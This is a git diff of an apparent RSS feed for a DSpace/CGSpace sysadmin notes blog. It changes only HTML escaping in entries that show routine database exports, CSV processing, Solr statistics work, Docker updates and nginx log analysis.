</code></pre></div>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspace63= &gt; \COPY (SELECT DISTINCT LOWER(text_value) AS subject, count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id IN (119, 120, 127, 122, 128, 125, 135, 203, 208, 210, 215, 123, 236, 242, 187) GROUP BY subject ORDER BY count DESC) to /tmp/2021-07-01-all-subjects.csv WITH CSV HEADER;
</span></span><span style="display:flex;"><span>COPY 20994
</span></span></code></pre></div>
<a href='https://alanorth.github.io/cgspace-notes/2021-07/'>Read more →</a>
</article>

View File

@ -17,11 +17,11 @@
&lt;ul&gt;
&lt;li&gt;Send Gaia the last batch of potential duplicates for items 701 to 980:&lt;/li&gt;
&lt;/ul&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4&#34;&gt;&lt;code class=&#34;language-console&#34; data-lang=&#34;console&#34;&gt;$ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv &amp;gt; /tmp/tac4.csv
$ ./ilri/check-duplicates.py -i /tmp/tac4.csv -db dspace -u dspace -p &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#39;fuuu&amp;#39;&lt;/span&gt; -o /tmp/2022-03-01-tac-batch4-701-980.csv
$ csvcut -c id,filename ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv &amp;gt; /tmp/tac4-filenames.csv
$ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv &amp;gt; /tmp/2022-03-01-tac-batch4-701-980-filenames.csv
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;</description>
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;&#34;&gt;&lt;code class=&#34;language-console&#34; data-lang=&#34;console&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;$ csvcut -c id,dc.title,dcterms.issued,dcterms.type ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv &amp;gt; /tmp/tac4.csv
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;$ ./ilri/check-duplicates.py -i /tmp/tac4.csv -db dspace -u dspace -p &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#39;fuuu&amp;#39;&lt;/span&gt; -o /tmp/2022-03-01-tac-batch4-701-980.csv
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;$ csvcut -c id,filename ~/Downloads/2022-03-01-CGSpace-TAC-ICW-batch4-701-980.csv &amp;gt; /tmp/tac4-filenames.csv
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;$ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv &amp;gt; /tmp/2022-03-01-tac-batch4-701-980-filenames.csv
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;</description>
</item>
<item>
@ -66,13 +66,13 @@ $ csvjoin -c id /tmp/2022-03-01-tac-batch4-701-980.csv /tmp/tac4-filenames.csv &
&lt;li&gt;Atmire merged some changes I had submitted to the COUNTER-Robots project&lt;/li&gt;
&lt;li&gt;I updated our local spider user agents and then re-ran the list with my &lt;code&gt;check-spider-hits.sh&lt;/code&gt; script on CGSpace:&lt;/li&gt;
&lt;/ul&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4&#34;&gt;&lt;code class=&#34;language-console&#34; data-lang=&#34;console&#34;&gt;$ ./ilri/check-spider-hits.sh -f /tmp/agents -p
Purging 1989 hits from The Knowledge AI in statistics
Purging 1235 hits from MaCoCu in statistics
Purging 455 hits from WhatsApp in statistics
&lt;span style=&#34;color:#960050;background-color:#1e0010&#34;&gt;
&lt;/span&gt;&lt;span style=&#34;color:#960050;background-color:#1e0010&#34;&gt;&lt;/span&gt;Total number of bot hits purged: 3679
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;</description>
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;&#34;&gt;&lt;code class=&#34;language-console&#34; data-lang=&#34;console&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;$ ./ilri/check-spider-hits.sh -f /tmp/agents -p
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;Purging 1989 hits from The Knowledge AI in statistics
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;Purging 1235 hits from MaCoCu in statistics
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;Purging 455 hits from WhatsApp in statistics
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#960050;background-color:#1e0010&#34;&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#960050;background-color:#1e0010&#34;&gt;&lt;/span&gt;Total number of bot hits purged: 3679
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;</description>
</item>
<item>
@ -86,9 +86,9 @@ Purging 455 hits from WhatsApp in statistics
&lt;li&gt;I experimented with manually sharding the Solr statistics on DSpace Test&lt;/li&gt;
&lt;li&gt;First I exported all the 2019 stats from CGSpace:&lt;/li&gt;
&lt;/ul&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4&#34;&gt;&lt;code class=&#34;language-console&#34; data-lang=&#34;console&#34;&gt;$ ./run.sh -s http://localhost:8081/solr/statistics -f &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#39;time:2019-*&amp;#39;&lt;/span&gt; -a export -o statistics-2019.json -k uid
$ zstd statistics-2019.json
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;</description>
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;&#34;&gt;&lt;code class=&#34;language-console&#34; data-lang=&#34;console&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;$ ./run.sh -s http://localhost:8081/solr/statistics -f &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#39;time:2019-*&amp;#39;&lt;/span&gt; -a export -o statistics-2019.json -k uid
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;$ zstd statistics-2019.json
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;</description>
</item>
<item>
@ -101,15 +101,15 @@ $ zstd statistics-2019.json
&lt;ul&gt;
&lt;li&gt;Export all affiliations on CGSpace and run them against the latest RoR data dump:&lt;/li&gt;
&lt;/ul&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4&#34;&gt;&lt;code class=&#34;language-console&#34; data-lang=&#34;console&#34;&gt;localhost/dspace63= &amp;gt; \COPY (SELECT DISTINCT text_value as &amp;#34;cg.contributor.affiliation&amp;#34;, count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2021-10-01-affiliations.csv WITH CSV HEADER;
$ csvcut -c &lt;span style=&#34;color:#ae81ff&#34;&gt;1&lt;/span&gt; /tmp/2021-10-01-affiliations.csv | sed 1d &amp;gt; /tmp/2021-10-01-affiliations.txt
$ ./ilri/ror-lookup.py -i /tmp/2021-10-01-affiliations.txt -r 2021-09-23-ror-data.json -o /tmp/2021-10-01-affili
ations-matching.csv
$ csvgrep -c matched -m true /tmp/2021-10-01-affiliations-matching.csv | sed 1d | wc -l
1879
$ wc -l /tmp/2021-10-01-affiliations.txt
7100 /tmp/2021-10-01-affiliations.txt
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;ul&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;&#34;&gt;&lt;code class=&#34;language-console&#34; data-lang=&#34;console&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;localhost/dspace63= &amp;gt; \COPY (SELECT DISTINCT text_value as &amp;#34;cg.contributor.affiliation&amp;#34;, count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2021-10-01-affiliations.csv WITH CSV HEADER;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;$ csvcut -c &lt;span style=&#34;color:#ae81ff&#34;&gt;1&lt;/span&gt; /tmp/2021-10-01-affiliations.csv | sed 1d &amp;gt; /tmp/2021-10-01-affiliations.txt
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;$ ./ilri/ror-lookup.py -i /tmp/2021-10-01-affiliations.txt -r 2021-09-23-ror-data.json -o /tmp/2021-10-01-affili
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;ations-matching.csv
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;$ csvgrep -c matched -m true /tmp/2021-10-01-affiliations-matching.csv | sed 1d | wc -l
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;1879
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;$ wc -l /tmp/2021-10-01-affiliations.txt
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;7100 /tmp/2021-10-01-affiliations.txt
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;ul&gt;
&lt;li&gt;So we have 1879/7100 (26.46%) matching already&lt;/li&gt;
&lt;/ul&gt;</description>
</item>
@ -148,8 +148,8 @@ $ wc -l /tmp/2021-10-01-affiliations.txt
&lt;ul&gt;
&lt;li&gt;Update Docker images on AReS server (linode20) and reboot the server:&lt;/li&gt;
&lt;/ul&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4&#34;&gt;&lt;code class=&#34;language-console&#34; data-lang=&#34;console&#34;&gt;# docker images | grep -v ^REPO | sed &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#39;s/ \+/:/g&amp;#39;&lt;/span&gt; | cut -d: -f1,2 | grep -v none | xargs -L1 docker pull
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;ul&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;&#34;&gt;&lt;code class=&#34;language-console&#34; data-lang=&#34;console&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;# docker images | grep -v ^REPO | sed &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#39;s/ \+/:/g&amp;#39;&lt;/span&gt; | cut -d: -f1,2 | grep -v none | xargs -L1 docker pull
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;ul&gt;
&lt;li&gt;I decided to upgrade linode20 from Ubuntu 18.04 to 20.04&lt;/li&gt;
&lt;/ul&gt;</description>
</item>
@ -164,9 +164,9 @@ $ wc -l /tmp/2021-10-01-affiliations.txt
&lt;ul&gt;
&lt;li&gt;Export another list of ALL subjects on CGSpace, including AGROVOC and non-AGROVOC for Enrico:&lt;/li&gt;
&lt;/ul&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4&#34;&gt;&lt;code class=&#34;language-console&#34; data-lang=&#34;console&#34;&gt;localhost/dspace63= &amp;gt; \COPY (SELECT DISTINCT LOWER(text_value) AS subject, count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id IN (119, 120, 127, 122, 128, 125, 135, 203, 208, 210, 215, 123, 236, 242, 187) GROUP BY subject ORDER BY count DESC) to /tmp/2021-07-01-all-subjects.csv WITH CSV HEADER;
COPY 20994
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;</description>
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;&#34;&gt;&lt;code class=&#34;language-console&#34; data-lang=&#34;console&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;localhost/dspace63= &amp;gt; \COPY (SELECT DISTINCT LOWER(text_value) AS subject, count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id IN (119, 120, 127, 122, 128, 125, 135, 203, 208, 210, 215, 123, 236, 242, 187) GROUP BY subject ORDER BY count DESC) to /tmp/2021-07-01-all-subjects.csv WITH CSV HEADER;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;COPY 20994
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;</description>
</item>
<item>
@ -271,17 +271,17 @@ COPY 20994
&lt;li&gt;I had a call with CodeObia to discuss the work on OpenRXV&lt;/li&gt;
&lt;li&gt;Check the results of the AReS harvesting from last night:&lt;/li&gt;
&lt;/ul&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4&#34;&gt;&lt;code class=&#34;language-console&#34; data-lang=&#34;console&#34;&gt;$ curl -s &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#39;http://localhost:9200/openrxv-items-temp/_count?q=*&amp;amp;pretty&amp;#39;&lt;/span&gt;
{
&amp;#34;count&amp;#34; : 100875,
&amp;#34;_shards&amp;#34; : {
&amp;#34;total&amp;#34; : 1,
&amp;#34;successful&amp;#34; : 1,
&amp;#34;skipped&amp;#34; : 0,
&amp;#34;failed&amp;#34; : 0
}
}
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;</description>
&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;&#34;&gt;&lt;code class=&#34;language-console&#34; data-lang=&#34;console&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;$ curl -s &lt;span style=&#34;color:#e6db74&#34;&gt;&amp;#39;http://localhost:9200/openrxv-items-temp/_count?q=*&amp;amp;pretty&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;{
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt; &amp;#34;count&amp;#34; : 100875,
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt; &amp;#34;_shards&amp;#34; : {
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt; &amp;#34;total&amp;#34; : 1,
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt; &amp;#34;successful&amp;#34; : 1,
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt; &amp;#34;skipped&amp;#34; : 0,
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt; &amp;#34;failed&amp;#34; : 0
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;</description>
</item>
<item>
@ -599,17 +599,17 @@ COPY 20994
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;# zcat --force /var/log/nginx/*access.log.*.gz | grep -cE &amp;quot;[0-9]{1,2}/Oct/2019&amp;quot;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;# zcat --force /var/log/nginx/*access.log.*.gz | grep -cE &amp;#34;[0-9]{1,2}/Oct/2019&amp;#34;
4671942
# zcat --force /var/log/nginx/{rest,oai,statistics}.log.*.gz | grep -cE &amp;quot;[0-9]{1,2}/Oct/2019&amp;quot;
# zcat --force /var/log/nginx/{rest,oai,statistics}.log.*.gz | grep -cE &amp;#34;[0-9]{1,2}/Oct/2019&amp;#34;
1277694
&lt;/code&gt;&lt;/pre&gt;&lt;ul&gt;
&lt;li&gt;So 4.6 million from XMLUI and another 1.2 million from API requests&lt;/li&gt;
&lt;li&gt;Let&amp;rsquo;s see how many of the REST API requests were for bitstreams (because they are counted in Solr stats):&lt;/li&gt;
&lt;/ul&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;# zcat --force /var/log/nginx/rest.log.*.gz | grep -c -E &amp;quot;[0-9]{1,2}/Oct/2019&amp;quot;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;# zcat --force /var/log/nginx/rest.log.*.gz | grep -c -E &amp;#34;[0-9]{1,2}/Oct/2019&amp;#34;
1183456
# zcat --force /var/log/nginx/rest.log.*.gz | grep -E &amp;quot;[0-9]{1,2}/Oct/2019&amp;quot; | grep -c -E &amp;quot;/rest/bitstreams&amp;quot;
# zcat --force /var/log/nginx/rest.log.*.gz | grep -E &amp;#34;[0-9]{1,2}/Oct/2019&amp;#34; | grep -c -E &amp;#34;/rest/bitstreams&amp;#34;
106781
&lt;/code&gt;&lt;/pre&gt;</description>
</item>
@ -620,7 +620,7 @@ COPY 20994
<pubDate>Tue, 01 Oct 2019 13:20:51 +0300</pubDate>
<guid>https://alanorth.github.io/cgspace-notes/2019-10/</guid>
<description>2019-10-01 Udana from IWMI asked me for a CSV export of their community on CGSpace I exported it, but a quick run through the csv-metadata-quality tool shows that there are some low-hanging fruits we can fix before I send him the data I will limit the scope to the titles, regions, subregions, and river basins for now to manually fix some non-breaking spaces (U+00A0) there that would otherwise be removed by the csv-metadata-quality script&amp;rsquo;s &amp;ldquo;unneccesary Unicode&amp;rdquo; fix: $ csvcut -c &#39;id,dc.</description>
<description>2019-10-01 Udana from IWMI asked me for a CSV export of their community on CGSpace I exported it, but a quick run through the csv-metadata-quality tool shows that there are some low-hanging fruits we can fix before I send him the data I will limit the scope to the titles, regions, subregions, and river basins for now to manually fix some non-breaking spaces (U+00A0) there that would otherwise be removed by the csv-metadata-quality script&amp;rsquo;s &amp;ldquo;unneccesary Unicode&amp;rdquo; fix: $ csvcut -c &amp;#39;id,dc.</description>
</item>
<item>
@ -634,7 +634,7 @@ COPY 20994
&lt;li&gt;Linode emailed to say that CGSpace (linode18) had a high rate of outbound traffic for several hours this morning&lt;/li&gt;
&lt;li&gt;Here are the top ten IPs in the nginx XMLUI and REST/OAI logs this morning:&lt;/li&gt;
&lt;/ul&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;# zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &amp;quot;01/Sep/2019:0&amp;quot; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;# zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &amp;#34;01/Sep/2019:0&amp;#34; | awk &amp;#39;{print $1}&amp;#39; | sort | uniq -c | sort -n | tail -n 10
440 17.58.101.255
441 157.55.39.101
485 207.46.13.43
@ -645,7 +645,7 @@ COPY 20994
814 207.46.13.212
2472 163.172.71.23
6092 3.94.211.189
# zcat --force /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E &amp;quot;01/Sep/2019:0&amp;quot; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
# zcat --force /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E &amp;#34;01/Sep/2019:0&amp;#34; | awk &amp;#39;{print $1}&amp;#39; | sort | uniq -c | sort -n | tail -n 10
33 2a01:7e00::f03c:91ff:fe16:fcb
57 3.83.192.124
57 3.87.77.25
@ -761,16 +761,16 @@ DELETE 1
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;# cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep &#39;Spore-192-EN-web.pdf&#39; | grep -E &#39;(18.196.196.108|18.195.78.144|18.195.218.6)&#39; | awk &#39;{print $9}&#39; | sort | uniq -c | sort -n | tail -n 5
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;# cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep &amp;#39;Spore-192-EN-web.pdf&amp;#39; | grep -E &amp;#39;(18.196.196.108|18.195.78.144|18.195.218.6)&amp;#39; | awk &amp;#39;{print $9}&amp;#39; | sort | uniq -c | sort -n | tail -n 5
4432 200
&lt;/code&gt;&lt;/pre&gt;&lt;ul&gt;
&lt;li&gt;In the last two weeks there have been 47,000 downloads of this &lt;em&gt;same exact PDF&lt;/em&gt; by these three IP addresses&lt;/li&gt;
&lt;li&gt;Apply country and region corrections and deletions on DSpace Test and CGSpace:&lt;/li&gt;
&lt;/ul&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;$ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-9-countries.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.coverage.country -m 228 -t ACTION -d
$ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-4-regions.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.coverage.region -m 231 -t action -d
$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-2-countries.csv -db dspace -u dspace -p &#39;fuuu&#39; -m 228 -f cg.coverage.country -d
$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace -u dspace -p &#39;fuuu&#39; -m 231 -f cg.coverage.region -d
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;$ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-9-countries.csv -db dspace -u dspace -p &amp;#39;fuuu&amp;#39; -f cg.coverage.country -m 228 -t ACTION -d
$ ./fix-metadata-values.py -i /tmp/2019-02-21-fix-4-regions.csv -db dspace -u dspace -p &amp;#39;fuuu&amp;#39; -f cg.coverage.region -m 231 -t action -d
$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-2-countries.csv -db dspace -u dspace -p &amp;#39;fuuu&amp;#39; -m 228 -f cg.coverage.country -d
$ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace -u dspace -p &amp;#39;fuuu&amp;#39; -m 231 -f cg.coverage.region -d
&lt;/code&gt;&lt;/pre&gt;</description>
</item>
@ -808,7 +808,7 @@ $ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace
&lt;li&gt;Linode has alerted a few times since last night that the CPU usage on CGSpace (linode18) was high despite me increasing the alert threshold last week from 250% to 275%—I might need to increase it again!&lt;/li&gt;
&lt;li&gt;The top IPs before, during, and after this latest alert tonight were:&lt;/li&gt;
&lt;/ul&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &amp;quot;01/Feb/2019:(17|18|19|20|21)&amp;quot; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &amp;#34;01/Feb/2019:(17|18|19|20|21)&amp;#34; | awk &amp;#39;{print $1}&amp;#39; | sort | uniq -c | sort -n | tail -n 10
245 207.46.13.5
332 54.70.40.11
385 5.143.231.38
@ -824,7 +824,7 @@ $ ./delete-metadata-values.py -i /tmp/2019-02-21-delete-1-region.csv -db dspace
&lt;li&gt;The Solr statistics the past few months have been very high and I was wondering if the web server logs also showed an increase&lt;/li&gt;
&lt;li&gt;There were just over 3 million accesses in the nginx logs last month:&lt;/li&gt;
&lt;/ul&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;# time zcat --force /var/log/nginx/* | grep -cE &amp;quot;[0-9]{1,2}/Jan/2019&amp;quot;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;# time zcat --force /var/log/nginx/* | grep -cE &amp;#34;[0-9]{1,2}/Jan/2019&amp;#34;
3018243
real 0m19.873s
@ -844,7 +844,7 @@ sys 0m1.979s
&lt;li&gt;Linode alerted that CGSpace (linode18) had a higher outbound traffic rate than normal early this morning&lt;/li&gt;
&lt;li&gt;I don&amp;rsquo;t see anything interesting in the web server logs around that time though:&lt;/li&gt;
&lt;/ul&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &amp;quot;02/Jan/2019:0(1|2|3)&amp;quot; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;# zcat --force /var/log/nginx/*.log /var/log/nginx/*.log.1 | grep -E &amp;#34;02/Jan/2019:0(1|2|3)&amp;#34; | awk &amp;#39;{print $1}&amp;#39; | sort | uniq -c | sort -n | tail -n 10
92 40.77.167.4
99 210.7.29.100
120 38.126.157.45
@ -979,7 +979,7 @@ sys 0m1.979s
&lt;li&gt;I added the new CCAFS Phase II Project Tag &lt;code&gt;PII-FP1_PACCA2&lt;/code&gt; and merged it into the &lt;code&gt;5_x-prod&lt;/code&gt; branch (&lt;a href=&#34;https://github.com/ilri/DSpace/pull/379&#34;&gt;#379&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;I proofed and tested the ILRI author corrections that Peter sent back to me this week:&lt;/li&gt;
&lt;/ul&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;$ ./fix-metadata-values.py -i /tmp/2018-05-30-Correct-660-authors.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.contributor.author -t correct -m 3 -n
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;$ ./fix-metadata-values.py -i /tmp/2018-05-30-Correct-660-authors.csv -db dspace -u dspace -p &amp;#39;fuuu&amp;#39; -f dc.contributor.author -t correct -m 3 -n
&lt;/code&gt;&lt;/pre&gt;&lt;ul&gt;
&lt;li&gt;I think a sane proofing workflow in OpenRefine is to apply the custom text facets for check/delete/remove and illegal characters that I developed in &lt;a href=&#34;https://alanorth.github.io/cgspace-notes/cgspace-notes/2018-03/&#34;&gt;March, 2018&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Time to index ~70,000 items on CGSpace:&lt;/li&gt;
@ -1073,11 +1073,11 @@ sys 2m7.289s
&lt;li&gt;I notice this error quite a few times in dspace.log:&lt;/li&gt;
&lt;/ul&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;2018-01-02 01:21:19,137 ERROR org.dspace.app.xmlui.aspect.discovery.SidebarFacetsTransformer @ Error while searching for sidebar facets
org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse &#39;dateIssued_keyword:[1976+TO+1979]&#39;: Encountered &amp;quot; &amp;quot;]&amp;quot; &amp;quot;] &amp;quot;&amp;quot; at line 1, column 32.
